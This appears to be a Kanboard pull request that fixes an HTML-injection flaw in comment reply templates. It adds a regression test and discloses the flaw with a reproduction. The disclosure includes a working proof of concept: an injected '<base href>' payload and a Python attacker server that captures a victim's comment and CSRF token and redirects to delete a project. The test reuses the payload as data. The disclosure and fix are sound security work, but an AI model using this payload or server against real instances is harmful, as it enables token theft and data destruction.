### PR TITLE
fix(security): escape comment reply text in template textarea

### DIFF
--- a/app/Template/comment/show.php
+++ b/app/Template/comment/show.php
@@ -69,7 +69,7 @@ if ($userRole === Role::APP_USER && $comment['visibility'] !== Role::APP_USER) {
             <?= $this->text->markdown($comment['comment'], isset($is_public) && $is_public) ?>
         </div>
         <template id="comment-reply-content-<?= $comment['id'] ?>">
-            <textarea><?= $this->text->reply($comment['name'] ?: $comment['username'], $comment['comment']) ?></textarea>
+            <textarea><?= $this->text->e($this->text->reply($comment['name'] ?: $comment['username'], $comment['comment'])) ?></textarea>
         </template>
     </div>
 </div>

--- a/tests/units/Core/TemplateTest.php
+++ b/tests/units/Core/TemplateTest.php
@@ -3,6 +3,7 @@
 namespace KanboardTests\units\Core;
 
 use KanboardTests\units\Base;
+use Kanboard\Core\Security\Role;
 use Kanboard\Core\Template;
 
 class TemplateTest extends Base
@@ -44,6 +45,41 @@ class TemplateTest extends Base
         $this->assertStringEndsWith(
             implode(DIRECTORY_SEPARATOR, array('app', 'Core', '..', 'Template', 'd.php')),
             $template->getTemplateFile('d')
+        );
+    }
+
+    public function testCommentReplyEscapesTemplateClosingTags()
+    {
+        $_SESSION['user'] = array(
+            'id' => 2,
+            'role' => Role::APP_USER,
+        );
+
+        $html = $this->container['template']->render('comment/show', array(
+            'comment' => array(
+                'id' => 1,
+                'user_id' => 1,
+                'username' => 'alice',
+                'name' => 'Alice',
+                'email' => '',
+                'avatar_path' => '',
+                'date_creation' => 0,
+                'date_modification' => 0,
+                'visibility' => Role::APP_USER,
+                'comment' => '</textarea></template><base href="http://127.0.0.1:8899/">',
+            ),
+            'task' => array('id' => 1),
+            'editable' => false,
+            'hide_actions' => true,
+        ));
+
+        $this->assertStringNotContainsString(
+            '<base href="http://127.0.0.1:8899/">',
+            $html
+        );
+        $this->assertStringContainsString(
+            '&lt;/textarea&gt;&lt;/template&gt;&lt;base href=&quot;http://127.0.0.1:8899/&quot;&gt;',
+            $html
         );
     }
 }


### PR DESCRIPTION
- [x] I have tested my changes thoroughly
- [x] No breaking changes were introduced
- [x] No regressions were observed
- [x] I have updated the unit tests and integration tests accordingly
- [x] I follow the existing [coding standards](https://docs.kanboard.org/v1/dev/coding_standards/)
- [x] My commit messages follow the [Conventional Commits specification](https://www.conventionalcommits.org/)

### Summary

A project member can break out of a comment's reply `<template><textarea>` and inject a live `<base>`. A project manager's normal comment submission then sends its content and CSRF token to the attacker, whose redirect deletes the project.

### Details

At `app/Template/comment/show.php:72`, unescaped `TextHelper::reply()` output enters `<template><textarea>`. Because `TextHelper::reply()` at `app/Helper/TextHelper.php:65-72` only prefixes quote markers, `</textarea></template>` closes both elements. The CSP lacks `base-uri` and `form-action`, so the injected base retargets the form.

`Token::validateSessionToken()` at `app/Core/Security/Token.php:99-112` verifies only a nonce HMAC against the session. The captured form token is therefore accepted by `ProjectStatusController::remove()` at `app/Controller/ProjectStatusController.php:87-98`.

### PoC

I reproduced this with official image v1.2.52.

Save this as `attacker.py`:

```python
from http.server import BaseHTTPRequestHandler, HTTPServer
from urllib.parse import parse_qs, urlencode

class H(BaseHTTPRequestHandler):
    def do_POST(self):
        form = parse_qs(self.rfile.read(int(self.headers.get("Content-Length", "0"))).decode())
        print(form, flush=True)
        self.send_response(302)
        self.send_header("Location", "http://127.0.0.2:8811/?" + urlencode({
            "controller": "ProjectStatusController", "action": "remove",
            "project_id": "1", "csrf_token": form["csrf_token"][0],
        }))
        self.end_headers()

HTTPServer(("127.0.0.1", 8899), H).serve_forever()
```

Run the two commands in separate terminals:

```sh
podman run -d --rm --name kanboard-poc -p 127.0.0.2:8811:80 docker.io/kanboard/kanboard:v1.2.52
python3 attacker.py
```

1. Open `http://127.0.0.2:8811`. Create project 1, a task, ordinary project member Alice, and project manager Bob.
2. Sign in as Alice, open the task, and submit this exact New comment: `ATTACK_MARKER</textarea></template><base href="http://127.0.0.1:8899/">`. Save it before Bob opens the task.
3. Sign in as Bob, open the same task, enter `BOB_PRIVATE_COMMENT` in New comment, and submit.

The attacker server receives Bob's comment and genuine token, then its redirect deletes project 1. An invalid-token request returned HTTP 403 and preserved the project; without the closing sequence, the base stayed inert. Escaping the reply output prevented the POST.

### Impact

The attacker obtains the victim-authored comment and CSRF token. With a project-manager victim, the captured token permits manager actions; the PoC deletes the project and its attachments. No JavaScript execution is claimed.

### Suggested fix

This PR escapes `TextHelper::reply()` at the textarea boundary and adds a unit regression.
